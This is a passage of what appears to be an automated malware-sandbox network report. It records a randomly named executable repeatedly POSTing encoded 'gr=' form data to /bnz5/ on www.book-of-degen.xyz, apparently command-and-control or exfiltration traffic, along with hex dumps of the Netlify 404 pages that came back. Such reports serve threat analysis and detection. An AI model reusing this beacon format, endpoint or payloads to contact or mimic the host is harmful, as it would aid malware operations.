6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 7d 2e 63 61 72 64 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 3b 70 61 64 64 69 6e 67 3a 32 34 70 78 3b
                                                                                                      Data Ascii: 9d8<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width:500px;padding:24px;
                                                                                                      Apr 16, 2024 12:00:51.419481039 CEST1228INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37
                                                                                                      Data Ascii: background:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#00706
                                                                                                      Apr 16, 2024 12:00:51.419518948 CEST563INData Raw: 2d 64 65 70 6c 6f 79 65 64 2d 6d 79 2d 73 69 74 65 2d 62 75 74 2d 69 2d 73 74 69 6c 6c 2d 73 65 65 2d 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 2f 31 32 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69
                                                                                                      Data Ascii: -deployed-my-site-but-i-still-see-page-not-found/125?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.54974175.2.60.5802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:53.910963058 CEST738OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.book-of-degen.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.book-of-degen.xyz
                                                                                                      Referer: http://www.book-of-degen.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 77 32 30 72 35 6b 53 77 71 43 73 66 36 6c 76 61 6b 4d 49 75 31 6e 7a 68 54 53 32 43 67 78 71 54 55 59 35 75 50 68 47 4c 34 79 46 71 71 62 33 5a 30 75 77 31 75 52 45 49 6b 43 62 58 50 56 45 54 47 69 62 69 30 64 6e 77 72 72 56 45 32 72 5a 77 43 52 49 36 46 44 71 76 6a 75 50 68 47 71 49 41 36 37 49 74 7a 6d 4a 4b 4f 74 63 38 58 31 67 78 37 37 59 79 30 64 4d 59 37 62 4a 6a 7a 68 4b 2b 6a 31 79 6a 7a 6f 2f 62 56 49 54 57 75 64 6e 73 6e 55 36 77 54 76 30 69 48 37 4f 66 76 71 72 6c 45 47 33 78 56 2f 62 34 59 52 53 6d 67 6a 39 64 56 75 4f 52 68 49 72 75 54 52 57 4e 2b 4a 76 70 32 58 6d 74 52 4d 45 51 69 54 66 38 41 4b 6a 2b 6d 78 39 66 79 39 63 58 32 59 6b 48
                                                                                                      Data Ascii: gr=w20r5kSwqCsf6lvakMIu1nzhTS2CgxqTUY5uPhGL4yFqqb3Z0uw1uREIkCbXPVETGibi0dnwrrVE2rZwCRI6FDqvjuPhGqIA67ItzmJKOtc8X1gx77Yy0dMY7bJjzhK+j1yjzo/bVITWudnsnU6wTv0iH7OfvqrlEG3xV/b4YRSmgj9dVuORhIruTRWN+Jvp2XmtRMEQiTf8AKj+mx9fy9cX2YkH
                                                                                                      Apr 16, 2024 12:00:54.031459093 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html
                                                                                                      Date: Tue, 16 Apr 2024 10:00:53 GMT
                                                                                                      Server: Netlify
                                                                                                      X-Nf-Request-Id: 01HVK5MBYG15N8ZTVMHJ1MWWT5
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Raw: 39 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 7d 2e 63 61 72 64 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 3b 70 61 64 64 69 6e 67 3a 32 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20
                                                                                                      Data Ascii: 9d8<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site Not Found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width:500px;padding:24px;background:#fff;color:#0e1e25;border-radius:8px;box-shadow:0
                                                                                                      Apr 16, 2024 12:00:54.031506062 CEST1167INData Raw: 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 63 6f 6c 6f 72 3a 23 30 35 34 38
                                                                                                      Data Ascii: 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last-of-type{margin-bottom:0}.inline-code{display:inline-
                                                                                                      Apr 16, 2024 12:00:54.031541109 CEST563INData Raw: 2d 64 65 70 6c 6f 79 65 64 2d 6d 79 2d 73 69 74 65 2d 62 75 74 2d 69 2d 73 74 69 6c 6c 2d 73 65 65 2d 70 61 67 65 2d 6e 6f 74 2d 66 6f 75 6e 64 2f 31 32 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69
                                                                                                      Data Ascii: -deployed-my-site-but-i-still-see-page-not-found/125?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      23192.168.2.54974275.2.60.5802940C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:00:56.544807911 CEST1755OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.book-of-degen.xyz
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.book-of-degen.xyz
                                                                                                      Referer: http://www.book-of-degen.xyz/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 77 32 30 72 35 6b 53 77 71 43 73 66 36 6c 76 61 6b 4d 49 75 31 6e 7a 68 54 53 32 43 67 78 71 54 55 59 35 75 50 68 47 4c 34 79 4e 71 71 6f 50 5a 30 50 77 31 76 52 45 49 75 69 62 53 50 56 46 52 47 69 53 71 30 64 71 50 72 70 74 45 33 4e 46 77 56 51 49 36 4b 44 71 76 71 4f 50 67 49 4b 4a 41 36 37 59 79 7a 6d 35 4b 4f 74 63 38 58 7a 6b 78 38 71 59 79 32 64 4d 58 72 72 4a 2f 33 68 4c 62 6a 31 71 5a 7a 6f 72 4c 56 34 7a 57 75 39 33 73 6c 69 4f 77 52 50 30 67 41 37 50 61 76 71 6d 37 45 47 37 58 56 2b 2b 6c 59 57 65 6d 78 48 41 63 52 2b 7a 49 39 50 4f 44 51 47 61 57 75 2b 6e 79 36 31 36 34 63 4c 6b 46 71 51 6a 76 4a 50 6e 6e 6f 41 73 6c 72 38 4e 4d 77 64 64 59 4c 54 42 54 6f 4a 46 55 63 6b 30 49 38 38 4f 55 6e 4c 37 33 56 6e 4a 56 65 66 76 2b 4b 4b 34 6c 2f 4b 32 30 6d 6a 79 66 63 55 79 55 4f 2b 4b 33 32 41 2b 44 70 41 44 6f 46 37 78 48 32 55 56 7a 58 49 49 44 6b 41 4c 66 45 37 6b 6d 35 39 6d 49 69 64 7a 70 56 75 6a 69 75 69 79 73 68 73 61 4b 73 61 48 42 4f 66 50 5a 61 49 5a 39 50 4e 37 56 36 51 55 49 4d 43 75 56 53 5a 39 48 75 7a 63 6e 61 72 34 75 47 77 38 53 30 68 39 32 62 4d 72 77 78 58 4e 78 49 48 4e 45 32 53 50 4d 78 76 64 6a 56 34 73 62 4d 4f 36 47 37 6f 38 44 54 63 4a 7a 65 78 62 42 2b 51 49 55 65 41 50 6a 56 39 2f 30 56 71 4b 58 39 63 2f 66 48 78 51 45 77 42 65 65 32 43 45 49 65 59 37 43 5a 4c 56 4e 54 49 6f 50 43 6e 52 4d 46 49 4a 73 61 6f 57 42 77 70 73 69 62 47 2f 33 53 49 55 54 64 54 64 32 6a 4b 63 6d 4c 55 39 6c 70 32 34 59 30 4c 47 66 4a 4c 33 50 68 69 36 6a 57 30 5a 46 77 48 46 45 45 77 52 6c 78 59 39 78 4b 6d 2b 6c 30 77 39 4c 70 48 56 62 6e 4a 57 4a 76 62 78 30 68 63 54 31 4b 4b 72 67 51 77 2b 37 6e 6f 39 77 65 66 51 47 73 6c 42 69 76 42 55 6d 58 30 7a 31 67 76 4d 41 57 67 30 4a 58 70 43 65 70 73 68 73 58 45 51 4e 42 6f 6b 63 62 6b 4c 55 33 4c 38 38 47 44 58 77 53 50 6b 47 42 44 4c 42 4c 6b 43 70 78 37 38 4f 62 36 63 30 71 54 6e 72 46 4a 56 62 30 69 56 49 46 36 36 46 75 4a 79 46 57 49 64 66 79 41 75 46 68 38 35 57 56 75 34 38 38 76 74 55 44 70 41 66 6b 6e 42 5a 41 67 6a 70 54 7a 70 63 37 72 64 4c 72 71 6c 4f 72 77 46 4b 68 2f 51 78 44 6d 58 43 50 58 52 51 36 75 61 65 2f 68 61 77 52 69 6e 2f 4a 50 4b 74 4f 33 38 6f 2b 6a 2f 77 45 2f 43 32 42 70 53 4b 6d 75 5a 6b 38 5a 4c 78 4e 61 41 46 4a 6b 41 58 50 31 71 61 46 38 75 54 30 6e 4b 72 73 71 41 68 78 4e 43 74 66 37 6a 48 78 6b 52 69 64 61 41 6c 30 45 46 63 51 4f 73 5a 64 59 6b 69 78 58 62 66 72 47 71 76 4d 66 49 65 46 71 4c 2f 7a 50 66 6b 72 55 64 41 50 59 45 72 54 6b 50 32 74 42 30 43 6c 69 6d 39 4b 72 77 50 74 52 6d 2b 31 44 52 63 4d 51 69 31 68 63 46 61 4a 62 6d 73 38 70 32 6a 34 49 46 34 5a 70 45 76 30 4d 5a 6d 4b 58 4e 6f 51 31 30 46 4a 6f 6b 68 6b 4c 69 64 64 51 4f 32 49 54 6e 56 63 49 7a 70 4d 49 43 76 38 49 73 46 32 78 43 36 57 6e 31 56 4d 30 4b 64 62 37 4e 78 72 73 61 48 35 65 55 4e 61 4d 4f 6c 6d 57 71 68 4e 45 52 58 4f 79 41 79 6d 52 79 33 39 37 64 38 77 42 52 69 34 68 64 76 42 71 49 33 68 74 68 4e 74 66 71 47 46 64 33 46 35 4d 61 43 76 55 68 38 37 75 61 43 56 4d 49 6b 37 32 59 4b 49 48 68 34 47 68 48 69 39 57 79 77 2f 63 51 50 37 4b 6c 4c 35 50 62 48 41 48 47 6d 33 61 45 57 48 6e 4f 48 4c 50 73 76 79 4c 79 6a 57 50 38 6c 43 50 45 4c 4b 66 6f 54 41 46 7a 5a 75 4a 2f 4b 6b 71 71 61 4d 5a 35 56 38 4a 69 4d 41 67 79 30 57 34 39 69 6b 57 71 62 43 73 4a 2b 57 42 35 38 63 62 59 6c 52 6c 37 72 79 35 65 70 34 63 4e 6e 42 6a 6d 36 65 66 67 48 4d 73 6d 4c 66 46 73 55 31 2f 59 61 37 74 74 72 61 59 70 45 4a 6c 4a 46 79 41 4a 6d 68 46 63 50 63 36 6a 70 71 46 41 38 47 48 6d 72 75 64 6b 61 44 48 56 7a 69 4a 6b 61 62 49 41 57 4f 33 39 4f 75 45 64 42 71 43 78 33 38 37 37 67 52 43 68 47 58 30 52 51 46 42 48 79 79 78 6b 38 59 35 75 4c 43 79 6e 74 53 61 4a 39 32 67 44 61 74 62 56 31 52 77 3d 3d
                                                                                                      Data Ascii: gr=w20r5kSwqCsf6lvakMIu1nzhTS2CgxqTUY5uPhGL4yNqqoPZ0Pw1vREIuibSPVFRGiSq0dqPrptE3NFwVQI6KDqvqOPgIKJA67Yyzm5KOtc8Xzkx8qYy2dMXrrJ/3hLbj1qZzorLV4zWu93sliOwRP0gA7Pavqm7EG7XV++lYWemxHAcR+zI9PODQGaWu+ny6164cLkFqQjvJPnnoAslr8NMwddYLTBToJFUck0I88OUnL73VnJVefv+KK4l/K20mjyfcUyUO+K32A+DpADoF7xH2UVzXIIDkALfE7km59mIidzpVujiuiyshsaKsaHBOfPZaIZ9PN7V6QUIMCuVSZ9Huzcnar4uGw8S0h92bMrwxXNxIHNE2SPMxvdjV4sbMO6G7o8DTcJzexbB+QIUeAPjV9/0VqKX9c/fHxQEwBee2CEIeY7CZLVNTIoPCnRMFIJsaoWBwpsibG/3SIUTdTd2jKcmLU9lp24Y0LGfJL3Phi6jW0ZFwHFEEwRlxY9xKm+l0w9LpHVbnJWJvbx0hcT1KKrgQw+7no9wefQGslBivBUmX0z1gvMAWg0JXpCepshsXEQNBokcbkLU3L88GDXwSPkGBDLBLkCpx78Ob6c0qTnrFJVb0iVIF66FuJyFWIdfyAuFh85WVu488vtUDpAfknBZAgjpTzpc7rdLrqlOrwFKh/QxDmXCPXRQ6uae/hawRin/JPKtO38o+j/wE/C2BpSKmuZk8ZLxNaAFJkAXP1qaF8uT0nKrsqAhxNCtf7jHxkRidaAl0EFcQOsZdYkixXbfrGqvMfIeFqL/zPfkrUdAPYErTkP2tB0Clim9KrwPtRm+1DRcMQi1hcFaJbms8p2j4IF4ZpEv0MZmKXNoQ10FJokhkLiddQO2ITnVcIzpMICv8IsF2xC6Wn1VM0Kdb7NxrsaH5eUNaMOlmWqhNERXOyAymRy397d8wBRi4hdvBqI3hthNtfqGFd3F5MaCvUh87uaCVMIk72YKIHh4GhHi9Wyw/cQP7KlL5PbHAHGm3aEWHnOHLPsvyLyjWP8lCPELKfoTAFzZuJ/KkqqaMZ5V8JiMAgy0W49ikWqbCsJ+WB58cbYlRl7ry5ep4cNnBjm6efgHMsmLfFsU1/Ya7ttraYpEJlJFyAJmhFcPc6jpqFA8GHmrudkaDHVziJkabIAWO39OuEdBqCx3877gRChGX0RQFBHyyxk8Y5uLCyntSaJ92gDatbV1Rw==
                                                                                                      Apr 16, 2024 12:00:56.665306091 CEST1228INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html
                                                                                                      Date: Tue, 16 Apr 2024 10:00:56 GMT
                                                                                                      Server: Netlify
                                                                                                      X-Nf-Request-Id: 01HVK5MEGTM54BM3C6NFASF488
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Data Raw: 39 64 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77 7d 2e 63 61 72 64 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 3b 70 61 64 64 69 6e 67 3a 32 34 70 78 3b
